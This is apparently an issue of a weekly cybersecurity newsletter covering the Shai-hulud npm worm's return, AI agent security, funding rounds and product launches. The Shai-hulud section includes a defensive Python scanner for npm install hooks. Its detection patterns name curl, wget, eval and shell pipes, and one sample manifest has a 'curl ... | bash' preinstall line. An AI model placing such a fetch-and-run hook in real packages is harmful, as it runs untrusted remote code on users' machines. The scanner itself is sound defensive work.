TCP #111: Shai-hulud is back; Data Lakes and AI SOCs; and More
What's hot in security🌶️ | Nov. 18th - Nov. 26th, 2025
Welcome to The Cybersecurity Pulse (TCP)! I'm Darwin Salazar, Head of Growth at Monad and former detection engineer in big tech. Each week, I bring you the latest security innovation and industry news. Subscribe to receive weekly updates! 📧
Reimagine SIEM architecture using AWS S3 Buckets
It’s time to unlock full visibility into your AWS ecosystem. Run federated search, detection, and triage directly across S3 buckets, data lakes, and even your existing SIEM with Vega.
Vega’s Security Analytics Mesh (SAM) analyzes your “data where it lives” with zero disruption. No ingest or egress fees. No swivel chair. No blind spots or data silos.
This is how smart SOC teams build a mesh architecture that’s flexible, cost-efficient and delivers full visibility with AI-driven detection.
Howdy! Short holiday week here in the US. It's also the biggest shopping holiday of the year, which means attackers will be ramping up their shenanigans. Big HugOps to you if you're a defender in the retail space!
Aside from that, nothing new and exciting to share on a personal front. Lots on the cyber front which we’ll dive into at some point.
Before that though, Happy Thanksgiving to all who celebrate! 🦃 Wishing you a love-filled holiday. Thanksgiving is all about gratitude (it's in the name). On that note, I'm extremely grateful for you, our readers, and our sponsor partners. Your support lets me know that I'm not just yelling into the void and that the work I do is actually moving the needle in the space, so thank you!
Let’s dive in and have some fun.
TL;DR 📰
🪱 Shai-hulud worm resurfaces with nasty new variant – 25K+ repos compromised; now wipes the victim's home directory if exfiltration fails
🕸️ AWS releases Agentic AI Security Scoping Matrix – Framework for securing autonomous AI across 4 autonomy levels
🎯 US creates Strike Force to take out SE Asian scam centers – DOJ, Treasury, State, DHS combine forces after $9B+ stolen from Americans in 2024
📱 CISA warns spyware crews breaking into Signal, WhatsApp – State-backed actors using linked device abuse and zero-click exploits on high-value targets
🍀Clover Security launches with $36M – Product Security startup backed by Wiz co-founders, Shlomo Kramer, and SVCI
🎭 Doppel raises $70M at $600M valuation – Social engineering defense platform 3x’d valuation in 6 months, CrowdStrike CEO invested personally
🔐 Vijil raises $17M for AI agent trust infrastructure – Continuous monitoring and runtime defense for agentic AI
🔑 Keycard acquires Runebook for MCP connectivity – AI agent IAM startup adds MCP integration
🌐 Guardio lands $80M Series B – Bringing enterprise-grade security to consumers at the browser level
☁️ CrowdStrike extends DSPM into runtime – Falcon Data Protection for Cloud now GA with eBPF-based monitoring
🧠 Intezer launches Forensic AI SOC – Hybrid AI + deterministic forensics approach, claims 98% accuracy and 4% escalation rate
🔍 Infoblox brings DNS threat intel to AWS Network Firewall – One-click deployment, no additional infrastructure
⚒️ Picks of the Week ⚒️
Infamous Shai-hulud Worm Resurfaces From the Depths
Shai-hulud, the self-replicating worm that terrorized open-source repos and packages two months ago, is back with a new, nastier variant that has compromised over 25K repos. That's a lot of repos, and not just any repos: we're talking projects heavily relied on by enterprises and the open-source ecosystem.
This variant executes malicious code during the preinstall phase, which expands exposure to both build and runtime environments, and it targets credentials across GitHub, Azure, AWS, GCP, and npm. If exfiltration fails, it deletes every writable file in the victim's home directory, a destructive fallback that marks a shift from pure data theft to punitive sabotage.
The variant's new persistence mechanisms suggest the actors want long-term footholds, not just credential harvesting. Popular projects from ENS Domains, PostHog, Postman, and Zapier have been compromised, and the campaign remains ongoing despite GitHub's removal efforts. *inserts 'everything is fine' dumpster fire meme*
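Because this variant fires during preinstall, the script has already run by the time a normal `npm install` finishes, so the practical check is to install with scripts disabled (`npm ci --ignore-scripts`, or `ignore-scripts=true` in `.npmrc`), inventory which packages actually declare lifecycle hooks, and only then rebuild the few that legitimately need them. Below is an added example of that inventory step, written for this issue; it is not code from Shai-hulud write-ups or from any npm tooling. The manifests it scans are constructed samples, and the indicator patterns are illustrative heuristics, not a signature for this worm.

```python
"""Inventory npm lifecycle hooks before letting them run (added example, not project code).

Parses package.json manifests (from a node_modules tree installed with
--ignore-scripts, or from the constructed samples below) and reports every
package that declares preinstall/install/postinstall/prepare hooks, ranking
first those whose hook text matches patterns commonly seen in install-time
malware: network fetches, eval'd or spawned code, encoded blobs, shell pipes.
A hit is a reason to read the script, not proof of malice (native modules
legitimately run `node-gyp rebuild`, many packages run `node install.js`).
"""
import json
import re
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators; names and patterns are this example's assumptions.
SUSPICIOUS_PATTERNS = {
    "network_fetch": re.compile(r"\b(curl|wget|fetch\(|https?://)", re.I),
    "dynamic_eval": re.compile(r"\b(eval\(|new Function\(|child_process)", re.I),
    "encoded_blob": re.compile(r"\b(base64|atob\(|Buffer\.from\([^)]*,\s*['\"]base64)", re.I),
    "shell_pipe": re.compile(r"\|\s*(sh|bash)\b", re.I),
    "bundled_runner": re.compile(r"\bnode\s+\S+\.js\b", re.I),  # weak signal on its own
}

# Constructed sample manifests standing in for a node_modules tree.
SAMPLE_MANIFESTS = {
    "left-pad-ish": {"name": "left-pad-ish", "scripts": {"test": "jest"}},
    "native-binding": {"name": "native-binding", "scripts": {"install": "node-gyp rebuild"}},
    "suspicious-util": {
        "name": "suspicious-util",
        "scripts": {"preinstall": "node setup.js && curl -s https://example.invalid/p | bash"},
    },
}


def scan_manifest(name, manifest):
    """Return a finding for one manifest, or None if it declares no lifecycle hooks."""
    scripts = manifest.get("scripts") or {}
    hooks = {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}
    if not hooks:
        return None
    indicators = sorted({
        label
        for cmd in hooks.values()
        for label, pat in SUSPICIOUS_PATTERNS.items()
        if pat.search(cmd)
    })
    return {"package": name, "hooks": hooks, "indicators": indicators}


def rank(findings):
    """Most indicators first, then alphabetical, so triage starts at the top."""
    return sorted(findings, key=lambda f: (-len(f["indicators"]), f["package"]))


def scan_manifests(manifests):
    """Scan a {name: parsed package.json} mapping and return ranked findings."""
    findings = [f for n, m in manifests.items() if (f := scan_manifest(n, m))]
    return rank(findings)


def scan_tree(root):
    """Walk a real node_modules tree under `root` and return ranked findings."""
    manifests = {}
    for pj in Path(root).rglob("package.json"):
        try:
            manifest = json.loads(pj.read_text(encoding="utf-8"))
        except (OSError, json.JSONDecodeError):
            continue  # unreadable or non-JSON file; skip rather than abort the scan
        manifests[manifest.get("name", str(pj.parent))] = manifest
    return scan_manifests(manifests)


def scan_samples():
    """Run the scanner over the constructed samples above."""
    return scan_manifests(SAMPLE_MANIFESTS)


if __name__ == "__main__":
    for finding in scan_samples():
        flags = ", ".join(finding["indicators"]) or "none"
        print(f"{finding['package']}: hooks={list(finding['hooks'])} indicators={flags}")
```

Point `scan_tree("node_modules")` at a tree installed with `npm ci --ignore-scripts`; packages that surface with no indicators (the `node-gyp rebuild` case) can be rebuilt selectively with `npm rebuild <pkg>`, while anything flagged gets its script read before it ever executes. In CI this adds one install pass and a few seconds of parsing rather than a slow manual gate on every pipeline run.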
The Agentic AI Security Scoping Matrix: framework for securing autonomous AI
AWS released a framework for securing agentic AI systems and it’s a great primer on how to think about agency, autonomy, and all the security risks that come with it. The framework highlights 4 levels/scopes of autonomy for agents and how to secure each scope across different security dimensions (i.e., IAM, logging, data etc.).
Highly recommend reading this if you’re touching or thinking about AI security at all.
US Creates ‘Strike Force’ to Take Out SE Asian Scam Centers

Southeast (SE) Asian cyber criminals defrauded Americans out of $9B+ in 2024 and SE Asian victims out of $18-37B in 2023. I'd say those numbers are probably 1.5-2x larger due to underreporting. Yes, this is a shit ton of money, but what's worse is that these are highly organized operations run off the back of "forced labor" by an estimated 400K+ people at scam compounds in Burma, Cambodia, and Laos.
The US govt. recently put together a strike force made up of the DOJ, Treasury, State, and DHS, combining law enforcement, diplomatic pressure, sanctions, and crypto-tracing capabilities. Bad news for the bad guys.
The Beekeeper with Jason Statham is worth a watch to better understand the scam call center economy. Actual conditions are much worse, but it gives you a good glimpse.
Zscaler reports strong Q1 FY26 earnings
Zscaler reported strong Q1 FY26 earnings yesterday, but shares dropped ~7% after hours on lowered guidance for Q2. 26% ARR growth is pretty impressive for a company of Zscaler's size. It proves they're still a leader in the SASE space, and with the recent SplxAI acquisition plus FedRAMP Moderate authorization in the EU, they should be generating even more pipeline soon.
The Numbers:
Quarterly Revenue: $788.1M (up 26% YoY)
Cash flow from ops: $448.3M, up from $331.3M
Deferred revenue: $2.35B, up 32% YoY (healthy pipeline)
You can dig into all their Q1 earnings assets here.
CISA warns spyware crews are breaking into Signal and WhatsApp accounts
The US CISA recently issued an alert warning that state-backed actors and commercial spyware operators are actively targeting Signal and WhatsApp users through linked device abuse, zero-click exploits, and spoofed apps. Targets include senior government/military officials and civil society groups across the US, Middle East, and Europe.
I have lots of thoughts on this. Not enough time or space to discuss here. However, this Darknet Diaries episode encapsulates the 0-day and nation-state actor economy that produces and fuels these novel, sophisticated attacks.
🔮 The Future of Security 🔮
AI Security
Vijil raises $17M to safeguard AI agents continuously
Vijil raised $17M to build “trust infrastructure” for AI agents, offering continuous monitoring, runtime defense, and automated compliance. Total raised now $23M. Backed by BrightMind Partners, Mayfield and Gradient.
More AI Security news ⬇️
Application Security
Clover Security launches with $36M + 40 head count
Product security startup out of Tel Aviv, backed by superstar angels like the Wiz co-founders and Shlomo Kramer (Cato, Check Point, Imperva), as well as SVCI. Their aim is to make security a natural, automated part of the software-building process.
Approach makes a lot of sense to me given the AI code gen boom + trajectory we’re headed in. Super slick website and branding. This company is one to watch.
More AppSec news ⬇️
Consumer Security
Guardio lands $80M to expand AI-driven protection for everyday internet users
Guardio raised $80M Series B to bring enterprise-grade security to consumers, with a focus on AI-generated threats. The Tel Aviv-based company operates at the browser level.
Data Security
Falcon Data Protection for Cloud Extends DSPM into Runtime
CrowdStrike announced GA of Falcon Data Protection for Cloud, which extends DSPM into runtime using eBPF-based monitoring.
Identity and Access Management
AI identity startup Keycard acquires Runebook to empower MCP connectivity
Keycard, an AI agent identity and access management startup, acquired Runebook to add simplified MCP (Model Context Protocol) connectivity to its platform. Keycard emerged from stealth last month with $38M from a16z, Acrew, and Boldstart.
More IAM news ⬇️
Network Security
Infoblox Brings DNS-Based Threat Intelligence to AWS Network Firewall
Infoblox launched managed rules for AWS Network Firewall, bringing its DNS-based threat intelligence natively into AWS environments. One-click deployment from the AWS console.
This is huge news: Infoblox easily has a top-3 threat intel team in the market and secures 13K+ medium-to-large environments, so their DNS and DDI solutions are best of breed. AWS customers now get some access to that without deploying additional infra.
Social Engineering Security
Doppel Raises $70 Million at $600 Million Valuation
Doppel raised $70M Series C at a $600M+ valuation, just six months after its Series B (3x valuation jump). The “social engineering defense” platform fights AI-powered impersonation, phishing, and deepfakes. CrowdStrike CEO George Kurtz has personally invested.
Security Operations
Introducing Intezer Forensic AI SOC
Intezer launched "Forensic AI SOC," positioning it as a hybrid approach that combines AI agents with deterministic forensic tools rather than pure LLM-based triage. It claims 98% accuracy, sub-minute triage, and only 4% of alerts escalated for human review. Strong customer proof and a testimonial from the MGM Resorts CTO, so we know it's not just fluff.
This does take a stab at the MDR market, but that’s been a given since the inception of AI SOC. MDR vendors need to evolve fast or acquire AI SOC capabilities. Kudos to Intezer on this launch.
Why security data lakes power AI in the SOC, with Cliff Crosland at Scanner.dev
This is a great discussion on how two emerging solutions can work together to deliver better security outcomes. AI of any kind is only as good as the quality, quantity, and diversity of the data it is fed. Scanner CEO Cliff Crosland is noticing a trend where customers are pairing their data lake with AI, and good things are happening.
More SecOps news ⬇️
Interested in sponsoring TCP?
Sponsoring TCP not only helps me continue to bring you the latest in security innovation, but it also connects you to a dedicated audience of 20,000+ CISOs, practitioners, founders, and investors across 125+ countries 🌎
Bye for now 👋🏽
That’s all for this week… ¡Nos vemos la próxima semana!
Disclaimer
The insights, opinions, and analyses shared in The Cybersecurity Pulse are my own and do not represent the views or positions of my employer or any affiliated organizations. This newsletter is for informational purposes only and should not be construed as financial, legal, security, or investment advice.
The Shai-hulud resurgence is genuinely alarming, especially the destructive fallback mechanism. The shift from pure data theft to punitive sabotage feels like a real escalation in supply chain threats. I'm curious how teams are balancing detection of malicious preinstall scripts without slowing down legitimate CI/CD pipelines, since that phase is often optimized for speed over scrutiny?